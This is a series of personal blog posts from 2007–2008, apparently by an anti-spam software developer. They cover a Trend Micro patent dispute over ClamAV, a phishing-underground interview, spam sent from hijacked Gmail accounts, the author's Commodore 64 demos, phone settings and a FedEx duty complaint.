"What has been interesting to note in this year's findings is the apparent low standings of bloggers and social media in general," said [Mark Cahalane, managing director of Edelman Dublin]. "One interpretation of the survey would be that bloggers have now entered the mainstream and people no longer distinguish between blogs and ordinary websites. This is also reflected by the fact that numerous high profile bloggers are widely quoted in the media."

However, as Damien noted, Piaras Kelly raised a very significant point about this -- 'the people surveyed for the research had to fit a certain demographic, including having to be aged between 35-64.' [...] 'A Generational gap is evident.' This press release corroborates that. Sure enough, most blog readers (and writers) would tend to be of the younger generation -- a pretty key point, one would assume, but one that most of the non-blogger coverage has omitted ;)

(Update: the term "authority figure" wasn't quite correct; replaced with what Edelman themselves use, "source of information".)

Trend Micro’s attack on open source

Published January 29, 2008

Trend Micro are demanding that Barracuda Networks pay licensing fees, alleging that they infringe U.S. Patent No. 5,623,600 with their use of the open-source anti-virus tool ClamAV. Here's a Barracuda press release, and here's some details from Barracuda:

Trend Micro alleges that Barracuda Networks and ClamAV infringe on Trend Micro's U.S. Patent No. 5,623,600. Barracuda Networks believes that the patent is invalid due to prior art and further believes that neither its products nor the ClamAV software infringe the patent.

On Sept. 21, 2006, Trend Micro sent Barracuda Networks a letter regarding a license to Trend Micro's '600 patent. After several discussions on paying a license for the patent, Trend Micro demanded Barracuda Networks either remove ClamAV from its products or pay a patent license fee. Barracuda Networks felt it had no choice other than to file for a declaratory judgment in early 2007 in U.S. Federal Court to invalidate Trend Micro's '600 patent and end continued legal threats against Barracuda Networks for use of the free and open source ClamAV software.

Trend Micro subsequently responded to that declaratory action and more recently, Trend Micro filed a claim with the International Trade Commission (ITC). The ITC voted to investigate the claim in December 2007. Trend Micro's ITC claim alleges that Barracuda Networks infringes on Trend Micro's '600 patent, but effectively implies that anyone using the free and open source ClamAV software at the gateway infringes the patent.

The interesting aspects of this case, from my point of view, are twofold -- the patent is a classic bad software patent, very broad and totally obvious both now and at the time it was issued; and it hinges on Barracuda's use of the free software antivirus product, ClamAV. Given Apache SpamAssassin's prevalence in many anti-spam mail filtering appliances (including Barracuda!), this is a very worrying precedent for us -- our product could be next, for some other patent troll company's extortion scheme.

For what it's worth, it appears this patent has long been a licensing moneyspinner for Trend. In 1997, once the patent was issued, Trend went on a spree; McAfee, Symantec and Integralis were sued, eventually buying licenses, as did Electric Mail Company. 2 years ago, Fortinet were sued and settled in their case.

I happily gave Barracuda a quote for their press release on this:

"Trend Micro's actions are clearly an attack on free and open source software and its users, as well as on Barracuda Networks. The '600 patent covers a trivial method, one which was obvious to anyone skilled in the art at the time the patent was written, and should be rendered invalid as soon as possible. I hope that Barracuda Networks is successful in its attempts to defend all users from this patent shakedown."

If you know of prior art for this patent, please head over to Barracuda's site and provide details -- helping to fend off this protection racket would be good for all of us. Barracuda say:

People should look for art dated prior to Trend Micro's filing date of September 26, 1995. The '600 patent is entitled "Virus Detection And Removal Apparatus For Computer Networks." We are interested in all material, including software, code, publications or papers, patents, communications, other media or Web sites that relate to the technology described prior to the filing date.

In particular, this prior art should show antivirus scanning on a firewall or gateway. However, many of the claims do not require virus detection at a gateway. So any material that illustrates virus scanning on a file server is also of interest.

We also believe that a product called MIMESweeper 1.0 from a company called Clearswift, Authentium, or Integralis anticipates several claims of the '600 patent. We have yet to locate a copy of this product and would appreciate anyone who has a copy sending it our way.

Some more coverage:

  • Don Marti at LinuxWorld: 'Regardless of the decision in this case, software patent trolls will continue to be a problem for all software companies, Eben Moglen says. "Getting them to [not operate] in your neighborhood is the best you can do."'

  • Matt Asay at C|Net: 'Antivirus and antispam innovation has tended to come from open source, not the large proprietary vendors. Trend Micro's lawsuit is designed to put cash in its pocket but will end up hurting the consumer.' (Matt led with my quote ;)

  • GrokLaw: 'Anyone using ClamAV, should Trend Micro be successful, is potentially a target.'

  • Ars Technica: 'The patent is very clearly without merit, but that hasn't stopped Trend Micro from using it to threaten ClamAV and extort money from several companies. Situations like this demonstrate a very urgent need for patent reform and illuminate the risks posed by broad software patents, particularly in the area of security.'

Interview with two phish-scene infiltrators

Published January 28, 2008

/. posted a link to this interview with Nitesh Dhanjani and Billy Rios, two guys who have infiltrated the "phishing underground".

It's a good article -- lots of detail on the current toolset of a typical phisher, and some details on the community itself:

I had always thought that most phishers were clever hackers evading authorities using the latest evasion techniques and tools. The reality of the matter is most of the phishers we tracked were sloppy and unsophisticated. The tools they used were rarely created by the phisher deploying the actual scam, and for the most part it seemed the phisher merely downloaded kits and tools from some place and reused over and over and over again. It also seemed that many phishers don't even really understand how the phishing kits they've deployed work! We also came across many phishing kits and tools that had simple backdoors written into the source code (essentially, phishers phishing phishers). These backdoors are easily spotted by anyone who has even a basic idea of how the source code flow worked, yet was undetected by many phishers. Maybe a few phishers out there are skilled, but the majority are clueless.

Here's something I've noted about spammers, too -- there's no honour among thieves:

The number of backdoors we saw was staggering. The servers serving the phishing sites had backdoors, the code used in the phishing kits had backdoors, the tools used by phishers had backdoors. Phishers aren't afraid to steal from regulars people and they are also not afraid to steal from other phishers. Some of the backdoors were meant to keep control over a compromised server, while other simply stole information that had been stolen by other phishers! We came across several forums where phishers, scammers, and carders basically identified other phishers, scammers, and carders that had scammed them. These shady characters may work with each other but they sure don't trust each other, that's for sure.

And this is a very important point about blacklists:

Phishers are likely to abuse the blacklists published for [anti-phishing] plugins for their own benefit. The blacklists are a list of known phishing sites that the plugins consume in order to identify what websites are fraudulent. These blacklists therefore contain IP addresses and host names of servers hosting phishing sites. Since phishing sites are commonly installed on servers that have been compromised, and phishers don't bother to patch systems they have installed their kits on, this list translates to a 'list of easily compromisable hosts' for other phishers.

On the latter point, this is one of the key benefits of DNS blocklists, compared to the downloaded, text-based style that Google initially used for its anti-phishing toolbar. To query a DNSBL, you need to know the address you're looking for first of all; but with a text file, you can read the lists in their entirety, without knowing the address in advance. (Google is now apparently tending to use the enchash format, which fixes this.)

And a final word:

For the next few years, we are going to continue to apply band-aids around the problem of data leakage, and continue to play whack-a-mole with the phishers without solving the actual problem at hand. In order to make any significant progress, we must come up with a brand new system that does away with depending on static identifiers. We will know weâ??ve accomplished this when we will be able to publish our credit reports publicly without fearing for our identities.

(I'd place more importance on the liability of the financial institutions, myself -- I think they get away with placing too much blame on the victims of fraud and identity theft.)

Good interview -- worth reading.

Insane Dell.ie markup

Published January 21, 2008

A good deal came up on a mailing list I'm on: SAMSUNG 245BW Black High Glossy 24" 5ms DVI Widescreen LCD Monitor for $459.99, or $409.99 after rebate, via Newegg.

A follow-up from a German poster: he'd just picked up a Dell 2407WFP-HC 'for the low, low price of 659 EUR'.

We marvelled at the price difference -- then I looked up Dell.ie forcomparison. I thought 659 EUR was bad, but Dell.ie is asking for 1,117.74 Euros inc VAT for the same product -- insane!!

What possible excuse could there be for that? EUR 458.74 worth of shipping maybe? Do they encase it in platinum? That's nearly three times the price of the Newegg monitor.

Update: Duh. I'm an idiot. That's a 2707WFP, not a 2407WFP; it's 3" bigger and quite a bit fancier. It appears Dell.ie is no longer selling the 2407WFP.

Bad law in North Dakota

Published January 17, 2008

This is very bad news for North Dakota-based anti-spammers -- a guy called David Ritz is being sued there by alleged porn spammer Jerry Reynolds, for performing DNS lookups, a DNS zone transfer and a Whois lookup. It appears the judge has found Ritz guilty.

This is astonishingly bad lawmaking by the judge. These are entirely innocuous tools, part of every network administrator's toolkit for debugging and examining internet traffic legitimately. There's nothing remotely criminal or malicious in their use, and the judge has allowed himself to be misled.

North Dakota Judge Gets it Wrong:

'Ritz's behavior in conducting a zone transfer was unauthorized within the meaning of the North Dakota Computer Crime Law. A zone transfer is simply asking a DNS server for all the particular public info it provides about a given domain. This is a common task performed by system administrators for many purposes. The judge is saying that DNS zone transfers are now illegal in North Dakota.'

More details from Ed Falk

David's legal defense fund

My Commodore 64 demos

Published January 10, 2008

I recently came across my record at the Commodore Scene Database, and was happy to find that someone had found and uploaded two demos I had written, back in my days as a member of the C=64 demo scene between 1988 and 1990:

(I was a member of the groups 'Excess' and 'Thundertronix' / 'TNT', going by the handle of 'Mantis'.)

With the help of CBA, I was overjoyed to track down another long-lost demo, my crowning achievement on the platform:

If you're curious, feel free to go read those wiki pages or download the .d64's -- they run fine in VICE, the Commodore emulator (amazingly). If you've only got time to check one, check Rhaphanadosis; it's much better than the others.

I'm very impressed with VICE. As far as I can tell, it's perfectly bug-for-bug compatible with the real hardware, playing all of the demos perfectly (apart from a little additional speed due to differing hardware performance). If you haven't already got VICE set up, bear in mind that after installing it, you'll need a copy of the C=64's ROM images; here's a local set.

Also, the Commodore Scene Database is pretty awesome -- it's a full-scale IMDB-style setup, tracking the history of the Commodore demo scene in massive detail. Nice work guys!

The demos were written 100% in 6502/6510 assembly. I developed them using an Action Replay cartridge's built-in monitor; it had an assembler, but one which didn't support symbolic addressing. In other words, every piece of assembly used hand-computed branch offsets, and every variable and subroutine was tracked -- on paper -- by memory location, rather than using symbolic labels. If you want to know what the monitor was like, the VICE built-in monitor is almost identical!

I wrote these when I was 16; part 4 of Rhaphandosis notes the date as being 20 May 1989.

It's interesting reading the scrollers, and doing web and CSDB searches in follow-up to see what happened next --- one of the other Excess members, Raistlin is now Robert Troughton, a successful game developer in the UK with several major titles under his belt.

A Google search for Thundertronix finds a copy of "sex'n'crime" zine, issue 17, July 1990, which notes:

one of the new groups formed in 1990 (jm: slightly off, I think) is THUNDERTRONIX, better known as TNT. they are based in ireland and are doing very well for themselves. they have, in my mind, one of the best coders in the uk, namely MANTIS. he is currently coding a game with many new routines, etc... hopefully he should get some demos out soon!

woo! Er, unfortunately that game never went anywhere. ah well. ;)

BTW, it's funny reading my scrollers in those demos. At the time, I was convinced that the c=64 was a dead platform -- yet here we are in 2008, and there's still a thriving demo scene on the Commodore. Incredible!

Vincent Browne on RTE’s coke habit

Published January 4, 2008

Before Christmas, it seemed you could hardly read a newspaper, listen to the radio or watch TV in Ireland without being bombarded with stories about how the country was awash in cocaine.

It's an attractive story, tying in nicely with the death of lingerie model Katy French, hand-wringing over Ireland's recent 'celtic tiger' wealth, a supposed loss of our traditions, etc. etc. RTE, our national broadcaster, made a tabloid series called 'High Society', which cashed in on the issue in a particularly crass way -- crappy "reconstructions" of actors chopping lines with voiceovers, dodgy-looking men handing over money to ominous music, that kind of thing.

Well, just before Christmas, Vincent Browne wrote a fantastic op-ed in the Irish Times regarding this. I have to quote this particularly perceptive passage:

Cocaine abuse is a social problem, but the thrust of much of RTE's coverage of the phenomenon is to suggest that it is a widespread, pervasive problem. There are no recent statistics available on the prevalence of cocaine consumption in Ireland - the last survey was done four years ago. The National Advisory Committee on Drugs (NACD) will be publishing a prevalence report next month and we will know then the size of the phenomenon.

But we have some indicators about the scale of cocaine use. The European drug agency EMCDDA estimates that 3 per cent of all adults in Europe aged between 15 and 64 have used cocaine at least once in their lives.

A third of these took cocaine during the previous year and half of these took cocaine during the previous month. This means that about 0.5 per cent of the adult population took cocaine over the previous month. And the data suggests that, for at least two-thirds of those who have ever taken cocaine, the drug is not a problem for them.

In the US the statistics are higher. Almost 15 per cent of the population aged between 12 and 64 have taken cocaine in their lives and 2.5 per cent took cocaine over the previous year. Again, this is suggestive that cocaine use for most people is not a problem, otherwise the number of people who took cocaine during the previous year as a proportion of the number of people who ever took cocaine would be far higher.

The figures for Ireland are likely to be that about 4 per cent of the adult population have taken cocaine in their lifetime, with about 1 per cent having taken cocaine in the previous year and 0.5 per cent having taken cocaine in the previous month.

It would be better if people did not take cocaine, but the prevalent contention that the consumption of cocaine at all is necessarily harmful and addictive is obviously false.

It would also be better if people did not drink here, for the problems related to the consumption of alcohol are far, far greater than in the case of cocaine.

Instead of presenting a balanced picture of the cocaine phenomenon, RTE has greatly exaggerated the issue, in a way more typically associated with tabloid journalism.

Well said!

Spambots stealing GMail and Hotmail passwords?

Published December 21, 2007

I just received this mail from a friend:

Dear friend

Welcome to stwoxy.com ! We are one of the largest electronic distributors and wholesalers in Beijing China. We offer qualified digital products: Motorcycles?TVs, Notebooks, phones. PSP, projectors, GPS, DVD, DV, DC, MP3/4 and so on, which are of world famous brands, such as Sony, IBM, PHILIPS, NOKIA, DELL and so on. All our items are brand new from the manufactures and they come with 1-3 years' after service. These days we are expanding our overseas market, and every item is sold in extremely low price. Such chances should never be missed, ladies and gentlemen, do come to stwoxy.com! you will surely have a big surprise! We are looking forward to hearing from you!

It was sent from a HTTP connection into GMail, and was delivered from there using valid DKIM, Domain Keys and SPF signatures. In addition, it was sent to all the addresses in his address book. In other words, this was no run-of-the-mill impersonation spam -- for this one, the spammer obtained my friend's username and password somehow, logged into GMail, scraped the address book, and then sent spam via GMail that way.

My friend says he didn't access GMail using a desktop mail client, but did have his Google password saved in his web browser (a pretty typical configuration). My theory is that some virus/malware has infected his desktop machine, captured the saved-passwords file from the web browser configuration, and used that to log into GMail. Alternatively, it could also be a guessable username and password which was picked up via dictionary attack, I guess...

This is the first case I've heard of where spammers are actively stealing user account authentication tokens, in order to take over the accounts for spamming. (We'd long predicted it, of course, since it's a natural response to "pay for mail" schemes... but since there's no widely-used pay-for-mail system available yet, it's premature!)

It seems this is not just a GMail thing, btw. Here's a report of the same thing happening to some French guy via HotMail last month (or in english). I don't speak Dutch, but this forum post looks like it might be the same situation.

If you're curious, here's a copy of the spam, delivered to a Yahoo! group; it appears these spammers aren't too sophisticated in terms of the text they're sending, since they haven't morphed that text, HTML, or even the domain in the link yet. It's just the malware that's sophisticated, at this stage.

GNOME, Google and the UNIX user interface

Published December 20, 2007

Recently, after a flurry of annoying user interface issues, I've switched my RSS reader from Liferea to Google Reader. Interestingly, it turns out that Google Reader actually fits better with the traditional UNIX user interface concept, I've found.

What triggered this was an upgrade from Liferea 1.0.x to 1.4.4 as part of Ubuntu Gutsy; this brought with it a lot of changed behaviours, such as 'drag-and-drop of feed URL to HTML view no longer subscribes', and one crucial UI issue, '"Skim through articles" only works with ctrl+space'.

I've been a long-time UNIX user, dating back to the days where curses-based interfaces were the norm. As such, I tend to drive commonly-used applications using keyboard commands where possible. (This isn't a purely UNIX thing; Windows has the phenomenon of the keyboard-wielding "power user", too.)

Liferea was attractive, since it offered the ability to skim through articles quickly by just pressing the "Space" key; simply press space to page down, or to skip to the next unread article if at the end of the current one. Unfortunately, Liferea 1.4.x breaks this, and it wasn't going to be fixed, since apparently a GNOME app shouldn't behave this way:

GTK explicitely does implement as a key binding for several of it's widgets. Rebinding means to break the default behaviour for such widgets (tree views, buttons, input fields). [....] Liferea as a web-browsing application should behave like any other web browser and like every other GNOME/GTK application as much as possible.

Now, I don't know if it's GNOME's fault, or what, but for a UNIX desktop app to break with UNIX UI conventions, that's a bad move in my opinion. I gave it a bit of argument in the bug tracker, but eventually gave up as I clearly wasn't getting anywhere. :(

Instead, based on recommendation from friends, I gave Google Reader a try, and quickly figured out its extensive collection of keyboard shortcuts. Now, I'm skimming through my feeds in even less time than it took with Liferea, simply by hitting "ga" to go to my "all unread items" list, then "j", "j", "j" to skip through the postings one by one. Sweet!

It's interesting to note that other Google web apps use the same concepts; Gmail also has a hefty set, and can be driven using them in a manner very reminiscent of the classic UNIX mailreader, Mutt. So, despite being designed with end-users in mind by extremely clever professional user experience designers, these apps still find space for power-user keyboard operation. Take note, GNOME.

Anyway, I'm not too bothered. Google Reader brings other benefits, such as fixing this bug: 'please add ability to go to previous entry in Unread feed', avoiding 'constant memory leak requires daily restarts', and, of course, the utility of being able to track the same set of feeds and keep track of which items I've read in two places (work and home).

If only it was open source ;)

Planet Antispam update

Published December 7, 2007

A brief update on Planet Antispam...

I've just added MailChannels' Anti-Spam Blog. Now -- in the interests of disclosure -- I'm a member of MailChannels' Technical Advisory Board. However, that didn't affect this -- their blog has had consistently good, interesting posts dealing with anti-spam-related topics, and without too much plugging of their own products. ;)

Also added recently:

If you know of any other good email anti-spam-related blogs, drop a line in the comments here. (Note that I'm trying to keep it email-related, however, so we're not covering web-spam.)

Spammers “giving up” according to Google

Published November 30, 2007

According to this Wired story, Google reckons spammers are giving up on spam:

a remarkable trend is underfoot, according to Brad Taylor, a staff software engineer at Google: The number of spam attempts -- that is, the number of junk messages sent out by spammers -- is flat, and may even be declining for the first time in years.

Actually, this is a wilful misunderstanding of what the Googler in question really said, which was that 'attempts to spam Gmail users have been leveling off over the last year and more recently, even declining slightly'. In other words, they didn't make an observation about the state of the spam problem on an internet-wide basis -- just about the "local" situation as it pertains to Gmail. Bad reporting there, Wired.

But, in passing...

David Berlind at ZDNet recently blogged a rather grumpy response to InfoWorld coverage of CEAS 2007. He raised a very important point:

If I could say something to the author of that story, it would be that so long as any anti-spam solution is not deployed universally throughout the Internet's e-mail system (in other words, so long as some anti-spam tech is not a standard), that anti-spam solution actually makes the spam problem worse. You read that right. Worse. Proprietary anti-spam solutions make the global spam problem worse. They are digging us deeper into the hole that the Internet is already in because everyone who makes those solutions is under the false belief that "s/he who is finally successful at filtering out all spam while allowing the legitimate mail in wins."

Google's blog post is a case in point: 'we're keeping more spam out of your inbox than ever before, so more and more, you can use Gmail for things you enjoy without even realizing that the spam filter is there most of the time.'

That's great -- but it doesn't help anyone except Gmail. It's a myopic view of the spam problem, and David's point stands.

(I disagree with his later conclusion that the only way forward is for Google, MS, AOL and Yahoo! to get together and 'commit to jointly supporting the same technical solutions' -- when the usual BigCos get together, they tend to focus on their own priorities. Take what happened back in 2005 with nofollow for blog-spam -- while it helped the search giants with their own overriding priority, which was to tweak their algorithms to filter out the spam on the search results page, it did nothing to slow the spam flood itself, which has continued unabated.)

We need more open-source, and open-data, anti-spam work.

Informed

Published November 30, 2007

This should be in the running for "least informative dialog ever".

(The information in question was that Firefox had been upgraded by the Ubuntu Gutsy Update Manager app, if you're curious...)

Working around O2 Ireland

Published November 28, 2007

I'm pretty conservative with my mobile phones -- until recently, my mobiles were all cheap, low-end, super-lightweight Nokias with long battery life and low "worry factor" (ie. not a big deal if they were lost or stolen). Very sensible.

I've finally started catching up with the gadgetorati, though -- my current phone is now a Sony Ericsson K550i, which is still small and light, but has nice features like a 2 megapixel camera, a decent amount of onboard flash space, and a good implementation of Java, hence support for GMail and Google Maps. (Thanks to Joe for the recommendation!)

The only downside is that it came from my operator, O2 Ireland, with some broken configuration settings. (This shouldn't be surprising, of course -- I don't think I've ever heard of a phone arriving with working data connectivity, from any operator, anywhere in the world.)

Anyway, here's what I've done so far to fix it. Hopefully this might be helpful for random google searchers.

1. "Failed to resolve hostname" when publishing photos:

Generally, when I'd try to publish a photo using its Blogger support, I'd get a "failed to resolve hostname" error message. Investigating further, I found that the "O2 WAP" service used a proxy server -- turning that off fixed the problem nicely. Nice reliable proxy you've got there, O2 ;)

Here's how to do that. Open the menu, then select Settings -> Connectivity -> Internet settings -> Internet Profiles. Select O2 WAP and hit More -> Settings. Select Use proxy and change it to No, then hit Save. Problem solved.

2. Cannot send email from the device:

O2's default mail server has a tendency to refuse to accept outbound mail from the phone. Switching to GMail for outbound SMTP works fine. Notice a trend here?

Open the menu, Messaging -> Email -> Settings -> New account. Set the Account name to "gmail". Scroll down to Email address, set it to "yourname@gmail.com". Connection type is "POP3", Username and Password are whatever your GMail account uses. Outgoing server is "smtp.gmail.com". Enter Advanced settings, and set Encryption to "TLS/SSL". Set Outgoing port to "25". Press the back button, then select the "gmail" account's tickbox to make it active, before pressing back again to exit the configuration screen.

3. The "side" buttons go online:

By default, if you hit the "globe" button or the "open window" button on the side of the phone, to the left and right of the main joystick, it's set to open various URLs at www.o2.ie. These buttons are prime UI real estate, and easily accidentally hit; I don't want to go online (and possibly incur a charge) if they're pressed.

Easily fixed. Open the menu, then select Settings -> Connectivity -> Internet settings -> Internet Profiles. Select O2 WAP and hit More -> Advanced, then Change homepage and enter "file:///" under Address and hit Save. It'll now issue an ugly warning if you press those buttons, but at least it won't go online. (It'd be nice to get a nicer fix for this.)

I'm sure there's plenty more; if you've got this phone and have any tips to share, feel free to drop a comment below.

In particular, I'd love to know how to further "de-O2ify" the UI; the top 3 buttons on the menu screen are taken up with worthless operator spam ("O2 Music Store", "O2 Menu" and "Entertainment", all of which go to various URLs at www.o2.ie), while the useful Applications and Alarm screens, which I use all the time, are hidden in a submenu. ugh.

Investing in real estate

Published November 21, 2007

Screen real estate, that is -- 3600x1050 pixels of it:

(That's a Samsung SyncMaster 225bw226bw connected to a Thinkpad T61p running Ubuntu Gutsy, if you're curious.)

‘Dead spammer’ story: yep, spam

Published November 15, 2007

Remember the 'Russian 'make penis fast' spammer murdered' fake blog posting I wrote about last month? I was right -- the site has now become a spammer link farm.

There's now a new category in the right-hand sidebar of the fake blog post. See if you can spot the odd one out:

  • Programming
  • Personal
  • Web 2.0
  • Python
  • Penis exercises
  • Uncategorized

Sure enough, "Penis exercises" is the only valid outlink from the page (all the others lead to the 'sorry, closed due to too much traffic' page). It leads to a page discussing the usual 'make penis fast' topics, with a batch more links to more pages along the same lines. If you follow the links a little, the whole thing appears to be hawking some device called "Size Genetics". Totally spammy.

New job!

Published November 13, 2007

So, as I've hinted previously, I've left Vast to work full-time at a new gig: PutPlace.

I'll be working on more EC2/S3/SQS-related large-scale cluster stuff, and on their open-source plans... looking forward to that. They're a great team -- lots of familiar faces from the Iona days -- and it finally gets me out of telecommuting from home, back into an office again after 5 years ;)

Joe has put up a nice blog post welcoming me. Cheers Joe!

Now to get to grips with Python. (I still love Perl though. ;)

Fedex Ireland and unfair duty charges

Published November 12, 2007

I've been on vacation for a week, introducing Bea to the many joys of the bogs of Connemara. I think she liked it.

While I was away, I appeared in Ireland's newspaper of record, the Irish Times, specifically in Conor Pope's 'Pricewatch' consumer-affairs column, under the byline "Shopped to the taxman". Here's a cut-and-paste of some relevant snippets:

Justin Mason [hey, that's me] contacted Pricewatch after being hit with just such a charge. In August, he and his wife, who were expecting a baby, received a package from friends in the US [thanks Nishad and Janet!] containing amongst other things, some hats, socks and a little hoodie for their baby.

"It was shipped via FedEx, got here in good time and was very cute," he says. The couple were delighted, until a couple of weeks later, when they received an invoice from FedEx looking for EUR 34.47, made up of EUR 2.49 duty, EUR 19.88 VAT and EUR 10 in "administration fees", plus an additional EUR 2.10 VAT on the "administration fee".

"This strikes me as pretty unfair, maybe there's duty payable, but I've never had to pay VAT on a gift I've received before? On top of that, being charged one-third of the price as an administrative fee? Ouch!"

The couple disputed the fee and were told if they didn't pay, the invoice would be sent to a debt collection agency and non-payment would affect their credit rating. A couple of weeks later, another gift arrived from the US, followed by another invoice looking for EUR 7.84 in duty, plus the EUR 10 administration fee and EUR 2.10 VAT on that fee. Mason disputed the charge and was eventually told it would be waived as it had a value of less than $50 (EUR 34.70) and was clearly labelled as a gift. There is tax relief called Small Parcel Standard Relief on goods purchased from outside the EU, which is EUR 22 for bought goods and EUR 45 for gifts, so the tax should never have been applied by FedEx.

We contacted FedEx and UPS, highlighting our readers' concerns. A spokesman for FedEx said the administration charge has always been in place in Ireland and was applied "to ensure customers receive their packages quickly".

He said that if it did not pay the VAT and duty, "packages would not be cleared through customs until the customer has paid them, thus adding severe delays to the delivery process".

So, to be honest, I'm not impressed at all with Fedex' response here. I was hoping they'd be more helpful, especially once it hit the most significant consumer-affairs column in the country -- but not at all :(

To recap -- since Conor didn't mention it -- here are my problems with the charges:

  • the packages were both genuine, unsolicited, gifts. Surely having to pay duty on a gift is not applicable; it certainly makes receiving a gift a particularly unpleasant experience!

  • the first package contained baby clothes, which are VAT-free in Irish tax law anyway.

  • we cannot seem to get contact details for someone at Customs and Excise to talk to about this, and Fedex have failed to get back to us since then.

Not sure what the next step is...

There's also a little follow-on discussion at Conor's blog.

Update: good news. A couple of days ago, a letter arrived from Fedex UK, containing 2 credit notes; both invoices had been reduced to EUR 0.00, citing "incorrect application of duty" for one, and "customer satisfaction policy" for the other. Hooray!